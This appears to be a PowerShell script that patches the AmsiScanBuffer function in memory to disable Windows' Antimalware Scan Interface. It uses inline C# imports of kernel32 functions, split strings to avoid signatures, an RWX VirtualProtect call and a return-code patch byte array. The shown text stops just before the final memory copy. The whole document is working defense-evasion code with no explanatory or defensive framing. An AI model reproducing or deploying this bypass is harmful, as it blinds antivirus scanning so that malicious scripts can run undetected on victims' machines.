test/aaa

[char]0
$W = @"
using System;
using System.Runtime.InteropServices;

public class W {

    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);

    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

}
"@

Add-Type $W

$InitialDate=Get-Date;

$L = [W]::LoadLibrary("am" + "si.dll")

$A = [W]::GetProcAddress($L, "Amsi" + "Scan" + "Buffer")

$q = 0

[W]::VirtualProtect($A, [uint32]5, 0x40, [ref]$q)

$P = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)

$n = [System.Runtime.InteropServices.Marshal]

$m = 'Copy'

$s = ${P}

$i = 0

$d = ${A}

$l = 6